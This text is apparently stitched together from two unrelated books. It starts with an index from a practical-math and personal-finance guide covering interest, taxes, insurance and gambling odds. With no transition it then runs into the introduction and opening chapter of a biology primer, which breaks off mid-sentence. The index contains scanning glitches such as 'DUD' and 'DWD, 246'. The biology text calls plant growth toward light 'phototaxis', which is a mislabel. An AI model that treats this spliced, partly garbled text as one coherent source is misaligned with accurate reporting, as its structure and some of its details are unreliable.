common stocks, 184 
commutativity in adding, 11 
complex carbohydrates, 110 
compound interest, 189-190 
constant (algebra), 29 
Consumer Price Index (CPI), 239 
conventions used in this book, 2-3 
conversion factor, 50-51 
converting 
annual expense to monthly, 166 
Celsius to Fahrenheit, 51 
decimals to fractions, 18 
dollars to euros, 246-247 
dollars to pounds, 246-247 
drops to fluid ounces, 127-128 
Fahrenheit to Celsius, 51 
fractions to decimals, 18 
fractions to percentages, 19 
kilometers to miles, 244 
metric to American units, 51 
miles to kilometers, 244 
percentages to fractions, 20 
percentages to ratios, 20 
ratios to percentages, 20 
tsp/tbsp to mL, 127 
weekly salary to monthly, 166 
coordinate system, Cartesian, 36 
copay (insurance), 204 
cord (cubic measure), 44 
counting 
cards, 158 
kids’ games, 252 
numbers, 10 
overview, 9-10 
coupon, 81-82, 84 
CPI (Consumer Price Index), 239 
craps (roll of dice), 159 
credit card 
incentives, 180 
interest rates, 179-180 
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monthly balance, calculating, 180 
overview, 179 
paying down, 180-181 
types of fees, 179 
using, pros and cons, 87-88 
using wisely, tips for, 88-89 
cross-multiplying, 48-49 
cruise insurance, 214 
cuboid, 43—44 
cutting lawn, 133-134 
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d (diameter), 40-41 
debit card (ATM), 87, 169 
decimal fractions, 10, 13, 18 
deductible 
auto insurance, 210 
health insurance, 204, 212-213 
income tax, 232, 233-236 
overview, 204 
deductions (paycheck), 226-227 
deed of trust (mortgage), 170-176, 214 
defined benefit/contribution plans 
(retirement), 192-194 
denominator 
100 as, 19 
common, 15 
inverting with numerator, 16-17 
making common, 15-16 
multiplying, 16 
same as numerator, 14 
deposit (DEP), 169 
depreciation, 76 
diagram, solving story/word 
problem, 25 
diameter (d), (2r), 40 
diet, 118, 120 
Dietary Reference Intake (DRI), 114 
dieting, versus diet, 120 
digital scale, 100 
digital timer, 100 
dining out, saving on, 84-85 
direct costs (business), 218 
discount, 85-86, 216-217 
discount points (interest), 172 
distance formula, 34, 144, 244 
distortions, statistical, 54-56 
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DIY (do it yourself), 138 
dividend, 200 
dividing 
by 5, 64 
by 10, 64 
defined, 12 
fractions, 16-17 
numbers, 12 
tips for, 63-64 
variables, 31 
division. See dividing 
do it yourself (DIY), 138 
don’t pass bet (craps), 159 
dot (.) symbol, 31 
double discounts, 86 
double down (blackjack/21), 158 
double time, 225 
down payment, 170 
DRI (Dietary Reference Intake), 114 
driving 
calculating gas mileage, 142, 247 
distance/speed/time formula, 144 
formula, arrival time, 144 
formula, average speed, 146 
formula, car repair, 147 
formula, distance traveled, 145-146 
fuel gauge, 142 
GPS, 145 
odometer, 145, 244 
speedometer, 146 
state of charge, 142 
vacation costs, 152-153 
driving under the influence (DUD), 246 
driving while impaired (DWD, 246 
durable goods, 76 
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education loan, 178 

education savings plan (529 plan), 182 

EFT (electronic funds transfer), 169 

Employee’s Withholding Allowance 
Certificate (W-4), 227-228 

Ending Redeemable Value (ERV), 198 

EOB (explanation of benefits), 212 

equilateral triangle, 40 

equivalencies, common, 99 


ERV (Ending Redeemable Value), 198 
estimated time of arrival (ETA), 145 
estimating 

value added tax, 65 

defined, 64 

paint for an area, 245 

sales tax, 65 

seating, 66 

servings for group, 90-91, 245-246 

techniques, 64-65 

tips, 66 

total grocery bill, 90 
exchange rate, 247 
exercising, 122-124 
expenses (business), 164, 218 
explanation of benefits (EOB), 212 
exponentiation, 31 
externalities (shopping), 94-95 
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factoring, 14 
Fahrenheit to Celsius, converting, 51 
fair odds bet, 155 
fats 
to avoid, 113 
benefits of, 110 
BMI, 121 
calorie content of, 117 
federal income tax (FIT), 226 
fee, 237-238 
finance, 163. See also investing 
financial instrument, 185-186 
first mortgage (deed of trust), 170 
FIT (federal income tax), 226 
fixed income securities, 184 
fixed-rate mortgage (FRM), 171 
flying costs (vacation), 151-152 
food. See also grocery store math; 
kitchen math 
benefits of various, 109-110 
calories in various, 117 
counting calories in, 115-116 
label, 111-112, 115 
RDA, 114-115 
to avoid, 113 
food label, 111-112, 115 


formula, for calculating 

adjusted gross income, 232 

amortization, 175 

area of circle, 42 

area of rectangle, 41 

area of square, 41 

area of triangle, 41-42 

average, 52 

average annual return (mutual 
fund), 198-199 

average price, 83 

average speed, 146 

BMI (body mass index), 121 

bond yield, 202 

car repair, 147 

Celsius to Fahrenheit, 51 

cost of fueling, 143 

credit card balance, 180 

difference, ideal and current 
weight, 120 

discount, 85-86, 217 

distance between, 34 

distance traveled, 145 

dividend yield, 200 

double discounts, 86 

driving costs, 152-153 

Fahrenheit to Celsius, 51 

fee, 238 

flying costs, 151-152 

future value, 190 

gross profit, 219 

half-pass technique (lawn cutting), 
133-134 

hidden costs, 78 

house edge/advantage, 156 

insurance premium, 213-214 

laying carpet, 134-135 

LTV (loan to value ratio), 173-174 

markup, 216-217 

medical/dental deductions, 235 

mileage, 142, 247 

net profit, 220 

painting room (area), 245 

payroll deduction, 226-227 

pizza amount for group, 245-246 

pre-tax profit, 220 

private mortgage insurance, 173-174 

probabilistic risk assessment, 206 

profit margin, 219 
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property tax, 172-173, 237 
ratio-proportion, 48 
sales tax, 236, 244 
story/word problem solution, 25 
taxable income, 232 
time and materials, 217-218 
time to destination, 144, 244 
tipping, 245 
unit price, 79-80 
volume (v), 44 
fractions 
adding, 15 
converting from percentages, 20 
converting to decimal fractions, 18 
in number line, 10 
reducing, 13-14 
types of, 13 
FRM (fixed-rate mortgage), 171 
front-end load, 197 
fuel, 142-143 
full-rotation angle, 38 
future value (investment), 190 
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gambling 
Big Six (Wheel of Fortune), 160 
blackjack/21, 157-158 
craps, 159 
house edge/advantage, 155 
keno, 160 
losing proposition, 188 
Lotto, 188 
odds, 154-155 
poker, 160 
roulette, 156, 160 
slot machine/one-armed bandit, 

156-157 

worst casino, 160 

games, math skill building 
Angry Birds, 253 
Big Fish Games website, 252 
Birthday Paradox, 250 
Everett Kaser website, 250 
flipping coin, 252 
guessing age, 251 
hidden object, 251-252 
Internet, 250 
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games, math skill building (continued) 


kids, 252 
logic puzzles, 250 
Sherlock, 250 
Sudoku, 249 
gas mileage, 142, 247 
GDP (gross domestic product), 
238-239 
generic product, 78 
geometry 
angles, 38-39 
Cartesian coordinate system, 36 
coordinate system, 35-36 
defined, 35 
line, 36-37, 44 
line segments, 37 
origin, 36 
perimeter, 42-43 
plane, 35 
point, 36 
quadrants, 36 
rays, 38 
shapes, 39-41, 45 
vertex, 38 
volume, 43-44 
global positioning system (GPS), 
145, 244 
GNP (gross national product), 238 
Google Maps website, 244 
government index, 238-239 
GPA (grade point average), 68-69 
GPS (global positioning system), 
145, 244 
Graunt, John, 206 
grid, 37 
grocery store math 
comparing packages, 92 
comparing square footage, 92 
comparing unit prices, 91 
comparing volume, 93 
estimating need, 90-91 
estimating total cost, 90 
gross domestic product (GDP), 
238-239 
gross national product (GNP), 238 
gross profit, 219 
growth funds, 197 
guessing age, 251 
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half-pass technique (lawn cutting), 
133-134 
health. See also weight, body 
calculating BMI, 121 
counting calories, 115-117 
defined, 109 
foods to avoid, 113 
insurance, 211-214 
managing weight, 117-118 
medication, 125-128 
nutrition needs, 110 
RDA (recommended daily 
allowance), 115 
reaching ideal weight, 118-120 
health insurance, 211-214 
health savings account (HSA), 182 
HELOC (home equity line of 
credit), 176 
hidden costs 
banking, 77 
defined, 76 
driving for vacation, 153 
examples of, 77-78 
formula for determining, 78 
travel, 77 
unbundling goods or services, 77 
hidden object game (HOG), 
251-252 
home equity line of credit 
(HELOC), 176 
home equity loan, 176 
home projects 
cutting lawn, 133-134 
do it yourself, 138 
laying carpet, 134-135 
mulching lawn, 131-132 
painting room, 135-136, 245 
pouring patio, 136-139 
seeding lawn, 130-131 
homeowners insurance, 210-211 
house edge/advantage 
American roulette, 156, 160 
Big Six (Wheel of Fortune), 160 
craps, 159 
defined, 155 
European roulette, 156
Keno, 160
losing due to, 188
poker/video poker, 160
HSA (health savings account), 182 
hunch play, 158 
icons, explained, 5
imperial system (British Imperial), 98 
improper fraction, 13-14 
income, 164-166, 231-232 
income funds, 197 
income generating (investment), 185 
income tax 
adjusted gross income, 231-232 
basic form (1040), 230-233 
deductions, 232, 234-236 
exemptions, 231, 232 
Form 1040, 230-233 
Form 1040 Schedule A, 234 
marginal rate, 233 
other taxes, 233 
overview, 230 
payment, 233 
refund/amount owing, 233 
tax owing, 232 
taxable income, 231-232 
total income, 231 
income tax deductions 
defined, 232 
donations to charity, 235 
formula for medical/dental, 235 
interest paid, 235 
itemizing, 234 
job expenses, 235-236 
losses, 235 
medical/dental, 235 
miscellaneous, 236 
taxes paid, 235 
website, losses, 235 
index funds, 197 
Individual Retirement Account 
(IRA), 192 
inflation/inflation rate, 187-188, 239 
insurance 
actuary, 205-206 
auto, 209-210 
business line, 209 
cruise, 214
determining premium, 208 
figuring risk, 205-207 
health, 211-213 
homeowners, 210-211 
life, 213-214 
life tables, 206 
moral hazard, 204 
mortality tables, 206 
non-medical health, 214 
overview, 203 
personal line, 209 
pet, 214 
PLPD, 209 
premium, 203-204 
private mortgage, 173-174, 214 
rationale, 205 
risk levels, 206-207 
state disability, 214 
terms, 204-205 
underwriters, 207 
unemployment insurance, 214 
insurance bet, 158 
insurance-based instrument, 186 
integer (whole number), 10 
interest 
calculating on bonds, 201 
CD (certificate of deposit), 181 
compound, 189-190 
defined, 170, 188 
on a fixed-rate mortgage, 171 
income tax deduction, 235 
monthly rate, 180 
rate, 171-172, 179-180 
reducing on mortgage, 175 
regular investment, 191-192 
regular savings account, 181 
simple, 189 
time value of money, 188 
using discount points, 172 
Internal Revenue Service (IRS) 
Form 1040, 230-233 
Internal Revenue Service (IRS) 
website, 195 
International System of Units (SI),
51, 98
inverting and multiplying fractions, 
16-17 
investing
appreciating versus income 
generating, 185 
beginning, 187 
bonds, 201-202 
common stocks, 184 
defined, 183 
depositing regularly, 191-192 
financial instruments, 185-186 
inflation, 187-188 
mixed, 185 
mutual funds, 196-199 
online calculator, 192 
pitfalls to avoid, 188 
present/future value, 190 
risk tolerance, 184 
savings accounts, 181-182 
stocks, 199-200 
investment. See also investing 
horizon, 184 
products, 184 
pyramid, 186-187 
investment-based instrument, 186 
IRA (Individual Retirement 
Account), 192 
IRS (Internal Revenue Service) Form 
1040, 230-233 
IRS (Internal Revenue Service) 
website, 195 
Ishango bone, 10 
isosceles triangle, 40 
kcal. See calories
Keno, 160 
keywords in word problems, 24 
kitchen math 
calculating per-serving costs, 
104-105 
choosing tools, 100 
estimating number of pizzas, 245-246 
evaluating buying in bulk, 106-107 
scaling recipes, 100-104 
understanding units of measure, 98 
using equivalences, 99 
using measuring spoons, 127 
l (length), measurement, 41, 43, 98
labels 
medication, 125-128 
nutrition, 111-112 
labor, defined, 146 
layaway, 89 
laying carpet, 134-135 
lenders’ mortgage insurance, 
173-174, 214 
length (l), measurement, 41, 43, 98
level loaded funds, 198 
level-premium insurance, 213 
LIBOR (London Interbank Offered 
Rate), 171 
license fee, 238 
lifetime maximum limits (insurance), 
205 
line (geometry), 36-37, 44 
line graph, 21 
line segments (geometry), 37 
liquid volume, 98 
loan 
amortizing, 174-175 
car, 176-177 
education, 178 
fixed term, 176 
home equity, 176 
home equity line of credit, 176 
mortgage as, 170 
payment elements, 170-174 
second mortgage, 176 
loan origination point, 172 
loan to value ratio (LTV), 173 
local stores, 94 
London Interbank Offered Rate 
(LIBOR), 171 
loose slots, 156 
LTV (loan to value ratio), 173 
lump sum payments, 175


• M •


making a wager, 154
making change, 220-221
managing weight, 117-118
mandatory payroll deductions, 226
marginal tax rate, 196, 233 
markup, 216 
mass (weight), 98 
mean, 52, 66 
measurement systems, 50-51, 98 
measuring spoons, 127 
median, 53, 68-69 
medical/dental deductions, 235 
Medicare, 226 
medication 
converting drops to fluid ounces, 
127-128 
converting tsp/tbsp to mL, 127 
dispensing liquid, 126-127 
forms of, 125-126 
reading labels, 125-126 
splitting tablets, 126 
medication label, 125-128 
medicine cup, 127 
medicine dropper, 127 
Medigap, 214 
mental math. See also games, math 
skill building 
estimating, 64-66 
finding averages, 66-68 
finding medians, 68-69 
tips for doing basic, 59-64 
MET (metabolic equivalent of 
task), 122 
metric system, 50-51, 98 
micronutrients, 110-112 
minerals, 110 
mixed fraction, 13 
money order, 87 
monthly fees (CHG), 169 
moral hazard (insurance), 204 
mortality tables, 206 
mortgage, 170-176, 214 
motor vehicle fee, 238 
mulching, 131-132 
multiplication. See multiplying 
multiplying 
by 5, 63 
by 10, 62 
cross, 48-49
defined, 12 
fractions, 16 
numbers, 12
tips for, 61-63 
variables, 31 
mutual funds 
defined, 186, 196 
Ending Redeemable Value, 198 
fees, 197-198 
formula, average annual return, 
198-199 
load, calculating, 198 
shares, classes of, 197 
shorter investment horizons, 184 
types of, 197 
natural (roll of dice), 159
natural numbers, 10 
negative integer (whole number), 10 
net income (item), 219 
net pay, 226-227 
net profit, 220 
Nevada Megabucks website, 156 
no-load funds, 198 
non-medical health insurance, 214 
non-negative integer (whole 
number), 10 
number line, 10 
numbers, 10 
numbers to memorize, 59-60 
numerator, 12-14, 16-17 
nutrition 
benefits of proper, 110 
components of, 109-110 
foods to avoid, 113 
labels, reading to determine, 
111-112 
Nutrition Facts label, 111-112 
obesity, 116
obtuse angle, 38
obtuse triangle, 39-40
odds, 58, 154-155
odds bet (craps), 159
odometer, 145, 244, 247
one-armed bandit/slot machine,
156-157
online shopping, 94, 96
operands, 11
operations, basic. See adding;
dividing; multiplying;
subtracting
opportunity cost, 138
order of operations (algebra), 33-34
organization of this book, 4-5
origin (geometry), 36
overhead, 218
overtime, 225


• P •


P/E ratio (price-to-earnings ratio), 
199-200 
painting room, 135-136, 245 
passline bet (craps), 159 
payment, options for, 86-87 
PayPal, 87 
payroll deductions, 226 
pedometer, 124 
penny stocks, 188 
per capita income, 239 
per-serving costs, 104-105 
percentage 
calculating discount, 82-83 
converting from fraction, 19 
converting to fraction, 20 
defined, 19 
as ratio, 20 
scaling recipe using, 101-103 
percentile, 53-54 
perimeter, 42-43 
permit fee, 238 
personal line (insurance), 209 
personal or public liability and 
property damage insurance 
(PLPD), 209 
pet insurance, 214 
pi (π)
as a constant, 29 
defined, 42 
value of, 251 
pie chart, 21-22 


PITI (principal, interest, taxes, 
insurance), 170-174 
plane (geometry), 35 
planting lawn, 132-134 
PLPD (personal or public liability and 
property damage insurance), 209 
PMI (private mortgage insurance), 
173-174, 214 
point (geometry), 36 
points (Weight Watchers), 120 
poker, 160 
positive integers, 10 
pouring patio, 136-139 
PPO (preferred provider 
organization), 212 
PRA (probabilistic risk 
assessment), 206 
practical math, defined, 1 
pre-tax profit, 220 
preferred provider organization 
(PPO), 212 
premium (insurance), 203-204, 208 
present value (investment), 190 
price-to-earnings ratio (P/E ratio), 
199-200 
principal, interest, taxes, insurance
(PITI), 170-174
principal (loan), 170-171, 188
private mortgage insurance (PMI),
173-174, 214
probabilistic risk assessment 
(PRA), 206 
probability 
Birthday Paradox, 250 
defined, 56 
flipping coin, 252 
formula, 56-57 
insurance use of, 205-207 
odds, 58, 154 
in throw of die, 154 
problems, word/story, 22-26 
profit/profit margin, 215, 219 
progressive jackpot, 156 
project accounting, 223-224 
proper fraction, 13-14 
property tax, 172-173, 237 
proportion, 48
proportionality, dimensionless. See
percentage
proposition bet (craps), 159
protein, 110, 117
pseudo-seasonal sale, 80
purchasing power, 239
pyramid scheme, 187


• Q •


quadrants (geometry), 36 
quantity pricing, 79-80 
quartiles (percentile), 54 
radius (r), 40
ratio
defined, 17, 48
loan to value, 173
odds, 58
percentage expressed as, 20
price-to-earnings, 199-200
ratio-proportion
applying to word/story problem, 25
defined, 48
equation, 48
scaling recipe, 103-104
steps, 49
ratio-proportion equation, 48
RDA (Recommended Daily
Allowance) website, 115
real-estate based instrument, 186
reasonableness check, 25
recipe scaling, 100-104
Recommended Daily Allowance
(RDA), 115
rectangle, 39, 41, 43, 130-131 
reflex angle, 38 
regular (straight) time, 225 
regular savings account, 181 
retail price, 215 
retirement plans, 192-195 
riders, 214 
right angle, 38 
right triangle, 39-40 
risk level (insurance), 206-207
risk tolerance, 184
roulette, 156, 160
rounding numbers, 62, 65
salary, 166
sale 
assessing claims, 81-86 
defined, 80 
percentage discount, 82-83 
types of, 80 
unit price, 106-107 
sales tax, 74-75, 236, 244 
SAT, 54 
savings account, 181-182 
savings-based instrument, 185 
scalene triangle, 40 
scaling recipe, 100-104 
SDI (state disability insurance), 
214, 226 
second mortgage (deed of trust), 176 
security (mortgage), 170 
seeding lawn, 131-132 
SEP IRA (small business employer 
plan), 192, 195 
serving size, 112, 116, 244-245 
shapes, basic, 39-41 
shopping 
in big box stores, 94 
calculating average price, 83 
calculating discounts, 82-83, 85-86 
considering hidden costs, 76-78 
determining how to pay, 86-89 
determining unit cost, 79-80 
finding total cost of acquisition, 
74-75 
finding total cost of ownership, 
75-76 
for groceries, 90-93 
impact on community, 94-96 
making tradeoffs, 78-79 
online, 94, 96 
sales tax, 74-75, 236, 244 
understanding coupons, 81-82, 84 
understanding sales, 80-86 
SI (International System of Units),
50-51, 98 
sick time, 225 
simple carbohydrates, 110 
simple fraction, 12-13 
SIMPLE IRA (small business employer 
plan), 192, 195 
SIT (state income tax), 226 
slot machine/one-armed bandit, 
156-157 
small business employer plan (SEP 
IRA), 192, 195 
small business employer plan 
(SIMPLE IRA), 192, 195 
snake eyes (roll of dice), 159 
SOC (state of charge), 142 
Social Security 
earning limit, 196 
Medicare payroll deduction, 226 
overview, 193, 195 
payroll deduction, 226 
speed, calculating, 34 
speedometer, 146 
spreadsheet, 164-165 
square 
calculating area of, 41 
defined, 39 
finding perimeter of, 43 
painting room measure, 135-136 
square root (√), 31
SSA (Social Security Administration) 
website, 195 
standard serving size, 112, 116 
state disability insurance (SDI),
214, 226
state income tax (SIT), 226 
state of charge (SOC), 142 
statistical fallacies, 54-56 
statistician, 51 
statistics (stats) 
average, 52 
defined, 51 
distortions using, 54-56 
obesity, affecting, 116 
step length formula, 124 
stock (equity) funds, 197, 199-200 
stores, types of, 93-96 
story/word problem, 22-26 
straight angle, 38 


student loan, 178 
subtracting 
defined, 11 
fractions, 16 
numbers, 11 
tips for, 61 
variables, 31 
subtraction. See subtracting 
Sudoku, 249 
sunk costs, 76 
swipe fee, 179 
systems of measurement, 50-51, 98 
tally stick, 10
tax 
bracket, 196, 233 
deferred, 193 
defined, 229 
versus fee, 237-238 
fees as, 237-239 
income, 230-236 
overview, 229 
property, 172-173, 237 
sales, 74-75, 236, 244 
on tips, 150 
TCA (total cost of acquisition), 74-75 
TCO (total cost of ownership), 75-76 
term life insurance, 213-214 
time 
calculating with speed/distance, 34 
driving, 244 
hourly employee, 224-225 
value of investing, 188-190 
time clock, 222-223 
timesheet, 221-223 
tipping 
calculating, 148-149, 245 
considerations about, 85 
customary, 148-149 
factoring in, 84 
formula, 148 
splitting, 149-150 
total cost of acquisition (TCA), 74-75 
total cost of ownership (TCO), 75-76 
tracking time, 221-223 
tradeoff, 78-79 


transportation costs, 151-153 
triangle 
area, calculating, 41-42 
defined, 39 
types, 39-40 
U.S. Department of Energy website, 142
U.S. Individual Income Tax Return, 
230-233 
U.S. Social Security Administration 
(SSA) website, 195 
UI (unemployment insurance), 214 
unbundling, goods or services, 77 
underemployed, 239 
underwriters, 207 
unemployment insurance (UI), 214 
unemployment rate, 239 
unit price 
calculating for packages, 92 
calculating for square footage, 92 
formula for determining, 79-80 
grocery comparison, 91 
United States customary units, 
50-51, 98 
v (volume). See volume
vacation time, 225 
variable (algebra), 28-29, 31 
VAT (value added tax), 65, 244 
vehicle registration fees, 177 
Introduction


Life is all around you, from invisible microbes and green
plants to the other animals with whom you share the
Earth. What’s more, these other living things aren’t just
around you — they’re intimately interconnected with your
life. Plants make your food and provide you with oxygen,
microbes break down dead matter and recycle materials that
all living things need, and insects pollinate the plants you rely
on for food. Ultimately, all living beings rely on other living
beings for their survival.


What makes biology so great is that it allows you to explore
the interconnectedness of the world’s organisms and really
understand that living beings are works of art and machines
rolled into one. Organisms can be as delicate as a mountain
wildflower or as awe-inspiring as a majestic lion. And
regardless of whether they’re plants, animals, or microbes, all
living things have numerous working parts that contribute to
the function of the whole being. They move, obtain energy, use
raw materials, and make waste, whether they’re as simple as a
single-celled organism or as complex as a human being.


Biology is the key you need to unlock the mysteries of life.
Through it, you discover that even single-celled organisms
have their complexities, from their unique structures to their
diverse metabolisms. Biology also helps you realize what a
truly miraculous machine your body is, with its many different
systems that work together to move materials, support
your structure, send signals, defend you from invaders, and
obtain the matter and energy you need for growth.


About This Book 


Biology Essentials For Dummies takes a look at the
characteristics all living things share. It also provides an
overview of the concepts and processes that are fundamental to
living things.
We put an emphasis on looking at how human beings meet 
their needs, but we also take a look at the diversity of life on 
planet Earth. 


Conventions Used in This Book 


To help you find your way through the subjects in this book, 
we use the following style conventions: 


Italics highlight new words or terms that are defined 
in the text. They also point out words we want to 
emphasize. 


Also, whenever we introduce scientific terms, we try to 
break the words down for you so that the terms become 
tied to their meanings, making them easier to remember. 


Foolish Assumptions 


As we wrote this book, we tried to imagine who you are and 
what you need in order to understand biology. Here’s what we 
came up with: 


You’re a high school student taking biology, possibly in
preparation for an advanced placement test or college
entrance examination. If you’re having trouble in biology
class and your textbook isn’t making much sense, try reading
the relevant section of this book first to give yourself a
foundation and then go back to your textbook or notes.


You’re a college student who isn’t a science major but is
taking a biology class to help fulfill your degree
requirements. If you want help following along in class, try
reading the relevant sections in this book before you go to a
lecture on a particular topic. If you need to fix a concept
in your brain, read the related section after class.


Icons Used in This Book 


We use some of the familiar For Dummies icons to help guide 
you and give you new insights as you read the material. Here’s 
the scoop on what each one means. 


The information highlighted with this icon is stuff we think
you should permanently store in your mental biology file. If
you want a quick review of biology, scan through the book
reading only the paragraphs marked with Remember icons.


This bull’s-eye symbol offers pointers that help you remember
the facts presented in a particular section so you can better
commit them to memory.


Where to Go from Here 


Where you start reading is up to you. However, we do have a
few suggestions:


If you’re currently in a biology class and having trouble
with a particular topic, jump right to the chapter or
section featuring the subject that’s confusing you.


If you’re using this book as a companion to a biology
class that’s just beginning, you can follow along with the
topics being discussed in class.


Whatever your situation, the table of contents and index can 
help you find the information you need. 


Chapter 1 


Exploring the Living World 


In This Chapter 
Identifying the characteristics of living things 
Introducing the three main types of living things 
Organizing living things into groups 
Valuing the diversity of life on Earth 
Observing the world like a scientist 


Biology is the study of life, as in the life that covers the
surface of the Earth like a living blanket, filling every
nook and cranny from dark caves and dry deserts to blue
oceans and lush rain forests. Living things interact with all
these environments and each other, forming complex,
interconnected webs of life.


In this chapter, we give you an overview of the big concepts 
of biology. Our goal is to show you how biology connects to 
your life and to give you a preview of the topics we explore in 
greater detail later in this book. 


Living Things: Why Biologists 
Study Them, What Defines Them 


Biologists seek to understand everything they can about living 
things, including 


The structure and function of all the diverse living things 
on planet Earth 


The relationships between living things


How living things grow, develop, and reproduce, including
how these processes are regulated by DNA, hormones, and
nerve signals


The connections between living things and their
environment


How living things change over time


How DNA changes, how it’s passed from one living thing
to another, and how it controls the structure and function
of living things


An individual living thing is called an organism. All organisms
share eight specific characteristics that define the properties
of life:


Living things are made of cells that contain DNA. A cell 
is the smallest part of a living thing that retains all the 
properties of life. In other words, it’s the smallest unit 
that’s alive. DNA, short for deoxyribonucleic acid, is the 
genetic material, or instructions, for the structure and 
function of cells. 


Living things maintain order inside their cells and 
bodies. One law of the universe is that everything tends 
to become random over time. According to this law, if 
you build a sand castle, it'll crumble back into sand over 
time. Living things, as long as they remain alive, don’t 
crumble into little bits. They constantly use energy to 
rebuild and repair themselves so that they stay intact. 


Living things regulate their systems. Living things maintain
their internal conditions in a way that supports life.
Even when the environment around them changes, organisms
attempt to maintain their internal conditions; this
process is called homeostasis. Think about what happens
when you go outside on a cool day without wearing a
coat. Your body temperature starts to drop, and your
body responds by pulling blood away from your extremities
to your core in order to slow the transfer of heat
to the air. It may also trigger shivering, which gets you
moving and generates more body heat. These responses
keep your internal body temperature in the right range for
your survival even though the outside temperature is low.


Living things respond to signals in the environment. If
you pop up suddenly and say “Boo!” to a rock, it doesn’t
do anything. Pop up and say “Boo!” to a friend or a frog,
and you’ll likely see him or it jump. That’s because living
things have systems to sense and respond to signals (or
stimuli). Many animals sense their environment through
their five senses just like you do, but even less familiar
organisms, such as plants and bacteria, can sense and
respond. For example, during the process of phototaxis,
plants direct their growth toward areas where they have
access to light.


Living things transfer energy among themselves and 
between themselves and their environment. Living 
things need a constant supply of energy to grow and 
maintain order. Organisms such as plants capture light 
energy from the Sun and use it to build food molecules 
that contain chemical energy. Then the plants, and other 
organisms that eat the plants, transfer the chemical 
energy from the food into cellular processes. As cellular 
processes occur, they transfer most of the energy back 
to the environment as heat. 


Living things grow and develop. You started life as a 
single cell. That cell divided to form new cells, which 
divided again. Now your body is made of approximately 
100 trillion cells. As your body grew, your cells received 
signals that told them to change and become special 
types of cells: skin cells, heart cells, liver cells, brain 
cells, and so on. Your body developed along a plan, with 
a head at one end and a “tail” at the other. The DNA in 
your cells controlled all these changes as your body 
developed. 


Living things reproduce. People make babies, hens
make chicks, and plasmodial slime molds make plasmodial
slime molds. When organisms reproduce, they pass
copies of their DNA onto their offspring, ensuring that
the offspring have some of the traits of the parents.


Living things have traits that evolved over time.
Birds can fly, but most of their closest relatives — the
dinosaurs — couldn’t. The oldest feathers seen in the
fossil record are found on a feathered dinosaur called
Archaeopteryx. No birds or feathers have been found in
any fossils that are older than those of Archaeopteryx.
From observations like these, scientists can infer that
having feathers is a trait that wasn’t always present on
Earth; rather, it’s a trait that developed at a certain point
in time. So, today’s birds have characteristics that
developed through the evolution of their ancestors.


Meet Your Neighbors: Looking
at Life on Earth


Life on Earth is incredibly diverse, beautiful, and complex.
Heck, you could spend a lifetime exploring the microbial
universe alone. The deeper you delve into the living world
around you, the more you can appreciate the similarities
between all life on Earth — and be fascinated by the
differences. The following sections give you a brief
introduction to the major categories of life on Earth (called
domains, as we explain in the upcoming section “Organizing Life
into Smaller and Smaller Groups: Taxonomy”).


Unsung heroes: Bacteria 


Consisting mostly of single-celled organisms, bacteria are
prokaryotic, meaning they lack a nuclear membrane around their
DNA. Most bacteria have a cell wall made of peptidoglycan: a
hybrid sugar-protein molecule.


Most people are familiar with disease-causing bacteria such
as Streptococcus pyogenes, Mycobacterium tuberculosis, and
Staphylococcus aureus. Yet the vast majority of bacteria on
Earth don’t cause human diseases. Instead, they play important
roles in the environment and health of living things,
including humans. Photosynthetic bacteria make significant
contributions to planetary food and oxygen production, and
E. coli living in your intestines make vitamins that you need to
stay healthy. So when you get down to it, plants and animals
couldn’t survive on Earth without bacteria.


Generally speaking, bacteria range in size from 1 to 10 
micrometers (one millionth of a meter) in length and are 
invisible to the naked eye. Along with being nucleus-free, they 
have a genome that’s a single circle of DNA. They reproduce 
asexually (meaning they produce copies of themselves) by a 
process called binary fission. 


Bacteria have many ways of getting the energy they need for
growth and various strategies for surviving in extreme
environments. Their great metabolic diversity has allowed them
to colonize just about every environment on Earth.


Bacteria impersonators:
Archaeans


Archaeans are prokaryotes, just like bacteria. In fact, you can’t
tell the difference between the two just by looking, even if
you look very closely using an electron microscope, because
they’re about the same size and shape, have similar cell
structures, and divide by binary fission.


Until the 1970s, no one even knew that archaeans existed; up
to that point, all prokaryotic cells were assumed to be
bacteria. Then, in the 1970s, a scientist named Carl Woese
started doing genetic comparisons between prokaryotes. Woese
startled the entire scientific world when he revealed that
prokaryotes actually separated into two distinct groups —
bacteria and archaea — based on sequences in their genetic
material.


The first archaeans were discovered in extreme environments
(think salt lakes and hot springs), so they have a reputation
for being extremophiles (-phile means “love,” so extremophiles
means “extreme-loving”). Since their initial discovery,
however, archaeans have been found everywhere scientists have
looked for them. They’re happily living in the dirt outside
your home right now, and they’re abundant in the ocean.


Because archaeans were discovered fairly recently, scientists 
are still learning about their role on planet Earth, but so far it 
looks like they’re as abundant and successful as bacteria. 


A taste of the familiar: 
Eukaryotes 


Unless you’re a closet biologist, you’re probably most familiar 
with life in eukaryotic form because you encounter it every 
day. As soon as you step outside, you can find a wealth of 
plants and animals (and maybe even a mushroom or two if 
you look around a little). 


On the most fundamental level, all eukaryotes are quite
similar. They share a common cell structure with nuclei and
organelles, use many of the same metabolic strategies, and
reproduce either asexually or sexually.


Despite these similarities, we bet you still feel that you’re
pretty different from a carrot. You’re right to feel that way.
The differences between you and a carrot are what separate
you into two different kingdoms. In fact, enough differences
exist among eukaryotes to separate them into four different
kingdoms:


Animalia: Animals are organisms that begin life as a cell
called a zygote that results from the fusion of a sperm
and an egg. The fertilized egg then divides to form a
hollow ball of cells called a blastula. If you’re wondering
when the fur, scales, and claws come into play, these
familiar animal characteristics get factored in much later,
at the point when animals get divided up into phyla,
families, and orders (see the “Organizing Life into Smaller and
Smaller Groups: Taxonomy” section later in this chapter
for more on these groupings).


Plantae: Plants are photosynthetic organisms that start
life as embryos supported by maternal tissue. This definition
of plants includes all the plants you’re familiar with:
pine trees, flowering plants (including carrots), grasses,
ferns, and mosses. All plants have cells with cell walls
made of cellulose. They reproduce asexually by mitosis,
but they can also reproduce sexually.


The definition of plants, which specifies a stage where an 
embryo is supported by maternal tissue, excludes most 
of the algae, like seaweed, found on Earth. Algae and 
plants are so closely related that many people include 
algae in the plant kingdom, but many biologists draw the 
line at including algae in the plant kingdom. 


Fungi: Fungi may look a bit like plants, but they aren’t
photosynthetic. They get their nutrition by breaking down
and digesting dead matter. Their cells have walls made
of chitin (a strong, nitrogen-containing polysaccharide).
This kingdom includes mushrooms, molds that you see on
your bread and cheese, and many rusts that attack plants.
Yeast is also a member of this kingdom even though it
grows differently; most fungi grow as filaments (that look
like threads), but yeast grow as little oval cells.


Protista: This kingdom is defined as everything else
that’s eukaryotic. Seriously. Biologists have studied
animals, plants, and fungi for a long time and defined
